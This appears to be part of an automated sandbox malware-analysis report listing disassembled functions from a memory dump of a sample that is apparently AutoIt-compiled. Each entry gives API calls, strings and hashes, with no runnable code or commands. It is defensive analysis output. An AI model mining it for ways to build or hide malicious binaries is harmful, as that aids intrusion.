Opcode ID: 00d1cccfa896738602d7100bdab46f13eecd835e1432b47b8229199794dccf4e
Instruction ID: 2000cf8d5815d2cbb7b77115073832d653fcc8cf483ceea09c74c2547f204092
Opcode Fuzzy Hash: 00d1cccfa896738602d7100bdab46f13eecd835e1432b47b8229199794dccf4e
Instruction Fuzzy Hash: 53717870A10A59DFCB14DF65D484A9EBBF0BF08304F1484A9E816AB392C771ED95CF91

Function 0024719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00247206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0024723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0024724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002472CF

Strings

DllGetClassObject, xrefs: 00247242

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 747d8c71fe9305b8acbf8c7cc1f258624bc6eb7e8a4f87a4660abab51cc0a708
Instruction ID: 9d52515709f1ee838c75a29bfc7f3e5f63e84bd77b654f9c04eda5de464b5bbe
Opcode Fuzzy Hash: 747d8c71fe9305b8acbf8c7cc1f258624bc6eb7e8a4f87a4660abab51cc0a708
Instruction Fuzzy Hash: F1416F71A14205EFDB19CF64C884A9A7BB9EF45310F2480AEFD199F20AD7F1D954CBA0

Function 00273D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00273E35
IsMenu.USER32(?), ref: 00273E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00273E92
DrawMenuBar.USER32 ref: 00273EA5

Strings

0, xrefs: 00273D89

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: d4b60f74aee13a15eb3cbd126eef16aa429e3c520ba9d5c115f015dc78313716
Instruction ID: 9316eb07f8a139904175d1b784cb92a08cd982e2408fb59a413f9190aa2bb43a
Opcode Fuzzy Hash: d4b60f74aee13a15eb3cbd126eef16aa429e3c520ba9d5c115f015dc78313716
Instruction Fuzzy Hash: 23415D75A2120AEFDB10DF60D884EEAB7B5FF48354F148119F909A7250D730AE64DF50

Function 00241DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 00243CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00243CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00241E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00241E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 00241EA9

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

Strings

ListBox, xrefs: 00241E25
ComboBox, xrefs: 00241DF0

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 45ef0718b9d679642893fb9ad0650833a46f4aa7087e1e9dceafa5d94da43888
Instruction ID: cadb2da740fbbafff744e19d432966b176051d819dfc7a4b3a020b9e43b07b27
Opcode Fuzzy Hash: 45ef0718b9d679642893fb9ad0650833a46f4aa7087e1e9dceafa5d94da43888
Instruction Fuzzy Hash: 14213575A10108BADB1CAFB1DC85CFFB7B8EF52350B10451DF825A71E1DB7449AA8620

Function 00272F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00272F8D
LoadLibraryW.KERNEL32(?), ref: 00272F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00272FA9
DestroyWindow.USER32(?), ref: 00272FB1

Strings

SysAnimate32, xrefs: 00272F68

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: ded6533a3bff734771643563edccb9f9786fc0c9e3f49d13db6b787343bad965
Instruction ID: 1693045bce21e30e942906fdce7c46700dfc1882b864b0df7a739f3590f02586
Opcode Fuzzy Hash: ded6533a3bff734771643563edccb9f9786fc0c9e3f49d13db6b787343bad965
Instruction Fuzzy Hash: 6621CD72220206EBEF104F74EC84EBB37BDEB59364F208618F958D2590D771DCA59B61

Function 00204D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00204D1E,00000003,?,00204CBE,00000003,002A88B8,0000000C,00204E15,00000003,00000002), ref: 00204D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00204DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00204D1E,00000003,?,00204CBE,00000003,002A88B8,0000000C,00204E15,00000003,00000002,00000000), ref: 00204DC3

Strings

mscoree.dll, xrefs: 00204D86
CorExitProcess, xrefs: 00204D98

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: fd3a42cce834fd329c3905e795017466f2f6c751ac9a7044a502a448fb06bcfe
Instruction ID: 1c9795e89308c508fb70fe9f78414f51f3a513965a82a77b421135931b9d7990
Opcode Fuzzy Hash: fd3a42cce834fd329c3905e795017466f2f6c751ac9a7044a502a448fb06bcfe
Instruction Fuzzy Hash: 3BF0AF74A10309BBDB15AFA0EC4DBADBBB4EF04711F1040A8F909A22A1CB305A90CBD0

Function 001E4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001E4EAE
FreeLibrary.KERNEL32(00000000,?,?,001E4EDD,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4EC0

Strings

kernel32.dll, xrefs: 001E4E94
Wow64DisableWow64FsRedirection, xrefs: 001E4EA8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: b871ca40c641240fefcd07e6937535791e39dc8b6fd0a91954be2cf989e97701
Instruction ID: 0bb6d19b53c21807b016a08ea8554dc0bf334f156269c682a454553e7b73a8f0
Opcode Fuzzy Hash: b871ca40c641240fefcd07e6937535791e39dc8b6fd0a91954be2cf989e97701
Instruction Fuzzy Hash: F0E0CD35E019625BD2351B367C1CB5FA654AFC2F62B550129FD0DD2100DF64CD4185B4

Function 001E4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001E4E74
FreeLibrary.KERNEL32(00000000,?,?,00223CDE,?,002B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001E4E87

Strings

kernel32.dll, xrefs: 001E4E5B
Wow64RevertWow64FsRedirection, xrefs: 001E4E6E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 8a03b40a47a054c1eac7a4b8f38fb1078c8ecceac9d51e75a9c2756acd27e115
Instruction ID: 40c7b767b20d2e0bbe622d5491b5e81970dd5d8e14b159b351b7556fda02ab65
Opcode Fuzzy Hash: 8a03b40a47a054c1eac7a4b8f38fb1078c8ecceac9d51e75a9c2756acd27e115
Instruction Fuzzy Hash: F7D0C231902A615766221B367C0CD8FAA18AF8AB113590128B80CA2110CF24CD41C5E0

Function 00252947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252C05
DeleteFileW.KERNEL32(?), ref: 00252C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00252C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00252CC0

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: d8f24d14bdc41d1c27e413fb2314471742543b0892af0f72c93703c293f384a3
Instruction ID: fbc76302b003c629295783e568c8fef5d4b37eabd4a157aef20d15f34136e7d6
Opcode Fuzzy Hash: d8f24d14bdc41d1c27e413fb2314471742543b0892af0f72c93703c293f384a3
Instruction Fuzzy Hash: 9CB17071D10119ABDF11DFA4CC85EDEB7BDEF09345F1040A6F909E6182EB309A588F65

Function 0026A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0026A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0026A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0026A468
CloseHandle.KERNEL32(?), ref: 0026A63D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: cedfaa77d65355bce1bb2083d82dfdd8c8ef4798ecaf2707703ae606b04c2eea
Instruction ID: 51178ac25867babbcd5fb00a0a3ba0703d0fa32368f267b45819950f8f8a4cdb
Opcode Fuzzy Hash: cedfaa77d65355bce1bb2083d82dfdd8c8ef4798ecaf2707703ae606b04c2eea
Instruction Fuzzy Hash: DFA1C0716047019FD720DF28D886F2AB7E5AF98714F14885DF55A9B3D2DBB0EC418B82

Function 0021BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00283700), ref: 0021BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,002B121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0021BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,002B1270,000000FF,?,0000003F,00000000,?), ref: 0021BC36
_free.LIBCMT ref: 0021BB7F

Part of subcall function 002129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?), ref: 002129DE
Part of subcall function 002129C8: GetLastError.KERNEL32(?,?,0021D7D1,?,00000000,?,00000000,?,0021D7F8,?,00000007,?,?,0021DBF5,?,?), ref: 002129F0

_free.LIBCMT ref: 0021BD4B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 2e906cc5803d071bce40931b7c7002640ea9b58cdc3d10d2e60079d6800bb1ba
Instruction ID: 80c6b3062db6d67072bf2c628772e885009a3ae645be3f1c9442a9257615f200
Opcode Fuzzy Hash: 2e906cc5803d071bce40931b7c7002640ea9b58cdc3d10d2e60079d6800bb1ba
Instruction Fuzzy Hash: AD511A71910219EFCB15EF65EC859EEB7F8EF60310B6002AAE424D7291DB305EF08B90

Function 0024E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0024CF22,?), ref: 0024DDFD

Part of subcall function 0024DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0024CF22,?), ref: 0024DE16

Part of subcall function 0024E199: GetFileAttributesW.KERNELBASE(?,0024CF95), ref: 0024E19A

lstrcmpiW.KERNEL32(?,?), ref: 0024E473
MoveFileW.KERNEL32(?,?), ref: 0024E4AC
_wcslen.LIBCMT ref: 0024E5EB
_wcslen.LIBCMT ref: 0024E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0024E650

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: bdfb672e6a1aa895b55423429248e64a5b4172882aeb60031cbddc8ebd9039a2
Instruction ID: 4db1a9b71bffe254ac68cf6d85f0994dcc329181e0f4ef443f6fa91542fb20dd
Opcode Fuzzy Hash: bdfb672e6a1aa895b55423429248e64a5b4172882aeb60031cbddc8ebd9039a2
Instruction Fuzzy Hash: D351B7B24183859BDB28EFA0DC819DF73DCAF94300F00491EF589D3191EF74A5988B56

Function 0026B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 0026C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0026B6AE,?,?), ref: 0026C9B5
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026C9F1
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA68
Part of subcall function 0026C998: _wcslen.LIBCMT ref: 0026CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0026BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0026BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0026BB63
RegCloseKey.ADVAPI32(?,?), ref: 0026BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0026BBB3

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 33ae96b976056b93da93921ceb1b5597cb6de0039e955ba1ece5ce88c0017c7c
Instruction ID: a76ad67e30069fe70515ff60a9684e8ddef1fc12386cb6679624b19f1b38bc30
Opcode Fuzzy Hash: 33ae96b976056b93da93921ceb1b5597cb6de0039e955ba1ece5ce88c0017c7c
Instruction Fuzzy Hash: C261C331218241EFD715DF64C494E2ABBE5FF84308F54895CF4998B2A2DB31ED85CB92

Function 00248BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00248BCD
VariantClear.OLEAUT32 ref: 00248C3E
VariantClear.OLEAUT32 ref: 00248C9D
VariantClear.OLEAUT32(?), ref: 00248D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00248D3B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 86347be10ce78b280ec2bb59522a194d5cfc9006be7448ea108cd52231028178
Instruction ID: 64abf24ce24796e6d390738cd75facfbea772169c605c01928295f226d1b3f0f
Opcode Fuzzy Hash: 86347be10ce78b280ec2bb59522a194d5cfc9006be7448ea108cd52231028178
Instruction Fuzzy Hash: 85518D71A1121ADFCB14CF28C894AAAB7F4FF89314B118559E909DB350E730E911CF90

Function 00258AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00258BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00258BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00258C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00258C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00258C5F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: c5bd0c6f8ef9a278f4e35cc42f8e6808df3ecfeef91f3b7375dfd445286587c7
Instruction ID: 07ef91a5aa33199d95349df5b1b526be100b0f059d3fdf11b3b686d405a592f3
Opcode Fuzzy Hash: c5bd0c6f8ef9a278f4e35cc42f8e6808df3ecfeef91f3b7375dfd445286587c7
Instruction Fuzzy Hash: B7517A35A00619AFDB04DF65D880E6EBBF5FF48314F088059E849AB3A2CB71ED51CB90

Function 00268EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00268F40
GetProcAddress.KERNEL32(00000000,?), ref: 00268FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00268FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00269032
FreeLibrary.KERNEL32(00000000), ref: 00269052

Part of subcall function 001FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00251043,?,7529E610), ref: 001FF6E6
Part of subcall function 001FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0023FA64,00000000,00000000,?,?,00251043,?,7529E610,?,0023FA64), ref: 001FF70D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 394ac8c437b10af6d05d62e0482d212be39ed2f7b8427ae7f31f98454ec78109
Instruction ID: b3c63e4e98d2e6a21b7a30076347484a39101ec483842fb619e40388a9aad1db
Opcode Fuzzy Hash: 394ac8c437b10af6d05d62e0482d212be39ed2f7b8427ae7f31f98454ec78109
Instruction Fuzzy Hash: 3F515934614645DFCB10DF68C4848ADBBF1FF59324B5481A8E80AAB762DB31EDC6CB90

Function 00276B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00276C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00276C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00276C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0025AB79,00000000,00000000), ref: 00276C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00276CC7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

